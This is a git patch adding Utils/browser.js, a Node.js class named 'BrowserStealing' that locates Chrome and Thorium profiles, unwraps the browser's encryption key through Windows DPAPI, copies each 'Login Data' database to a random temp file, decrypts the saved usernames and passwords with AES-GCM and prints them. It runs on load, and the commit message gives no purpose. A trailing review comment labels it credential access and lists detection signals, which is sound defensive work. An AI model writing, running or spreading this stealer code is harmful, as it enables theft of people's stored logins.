From 4619948c9e14998ed34479c1205badbef795a30c Mon Sep 17 00:00:00 2001 From: gumbobr0t <96620548+gumbobr0t@users.noreply.github.com> Date: Sat, 18 Nov 2023 16:32:31 +0100 Subject: [PATCH] Add files via upload --- Utils/browser.js | 136 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 136 insertions(+) create mode 100644 Utils/browser.js diff --git a/Utils/browser.js b/Utils/browser.js new file mode 100644 index 0000000..a69bfa2 --- /dev/null +++ b/Utils/browser.js 
@@ -0,0 +1,136 @@ +const os = require('os'); +const fs = require('fs'); +const sqlite3 = require('sqlite3').verbose(); +const dpapi = require('./node-dpapi'); +const crypto = require('crypto') +const path = require('path') + +class BrowserStealing { + constructor() { + this.browserPaths = [path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data'), path.join(os.homedir(), 'AppData', 'Local', 'Thorium', 'User Data')] + this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'] + this.password_command = 'SELECT action_url, username_value, password_value FROM logins'; + //this.cookie_command = 'SELECT * FROM cookies'; + this.tempDir = `${os.homedir()}\\AppData\\Local\\Temp`; + this.tempDirCreated = `${this.tempDir}\\${Math.random().toString(36).substring(7)}`; + + //this.cookie_count = 0 + this.password_count = 0 + } + + generateRandomString() { + const randomCharacter = () => Math.random().toString(36).substring(2, 3).toUpperCase(); + return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`; + } + + async getPasswords() { + fs.mkdir(this.tempDirCreated, (error) => { + if (error) { + console.error('Error creating temp directory:', error); + return; + } + console.log('Temp Directory created successfully.'); + for (const browserPath of this.browserPaths) { + console.log(browserPath); + const local_state = path.join(browserPath, 'Local State'); + console.log(local_state); + + fs.readFile(local_state, 'utf8', (err, data) => { + if (err) { + console.error('Error reading local state file:', err); + return; + } + + const encrypted = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5); + + const decrypted = 
dpapi.unprotectData(Buffer.from(encrypted,"utf-8"), null, "CurrentUser"); + + console.log('Decryption Key:', decrypted); + + for (const profile of this.browserProfiles) { + const password_file = path.join(browserPath, profile, 'Login Data') + console.log(password_file) + const decryption_file = path.join(this.tempDirCreated, this.generateRandomString()) + console.log(decryption_file) + + fs.copyFile(password_file, decryption_file, (error) => { + if (error) { + console.error('Error copying login data file:', error); + return; + } + console.log('Login data file copied successfully.'); + + const db = new sqlite3.Database(decryption_file, sqlite3.OPEN_READWRITE, (err) => { + if (err) { + console.error('Error opening login database:', err); + return; + } + + db.all(this.password_command, (err, rows) => { + if (err) { + console.error('Error executing login SQLite command:', err); + } else { + const formattedRows = rows.map(row => { + if (row && row['password_value']) { + let password_value = row['password_value']; + let start = password_value.slice(3, 15), + middle = password_value.slice(15, password_value.length - 16), + end = password_value.slice(password_value.length - 16, password_value.length), + decipher = crypto.createDecipheriv('aes-256-gcm', decrypted, start); + decipher.setAuthTag(end); + + this.password_count++; + + return { + action_url: row.action_url ? row.action_url.toString() : '', + username_value: row.username_value ? 
row.username_value.toString() : '', + password_value: decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString(), + }; + } else { + return { + action_url: '', + username_value: '', + password_value: '', + }; + } + }); + + console.log('Password list:', formattedRows); + console.log('Password count:', this.password_count); + } + + db.close((err) => { + if (err) { + console.error('Error closing login database:', err); + } + }); + }); + }); + }); + fs.unlink(decryption_file, (error) => { + if (error) { + console.error('Error deleting decryption password file:', error); + } else { + console.log('Decryption password File deleted successfully.'); + } + }); + } + }); + } + }); + //this.cleanUp() + } + + //cleanUp() { + // fs.rm(this.tempDirCreated, { recursive: true }, (error) => { + // if (error) { + // console.error('Error deleting temp directory:', error); + // } else { + // console.log('Temp Directory deleted successfully.'); + // } + // }); + //} +} + +const browserStealer = new BrowserStealing(); +browserStealer.getPasswords()
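Review bot: `Utils/browser.js` arrives with no header comment and a commit message of only "Add files via upload", yet `getPasswords` reads each browser's `Local State`, unwraps `os_crypt.encrypted_key` with `dpapi.unprotectData` and AES-GCM-decrypts `password_value` from every profile's `Login Data`, which is browser credential access (ATT&CK T1555.003). A header such as `// Decrypts the current user's saved Chrome/Thorium logins; credential-access tooling, see T1555.003` would make that visible to anyone triaging the repository. Everything needed for detection is in this hunk: a non-browser process opening `Local State` and `Login Data` under `AppData\Local\...\User Data`, a copy of `Login Data` to a random name inside a random directory under `AppData\Local\Temp`, and the unwrapped key and plaintext rows written with `console.log`. Alerting on those two file reads by any process other than the browser itself, and on a Node process calling DPAPI through a module like `./node-dpapi`, covers the code as written.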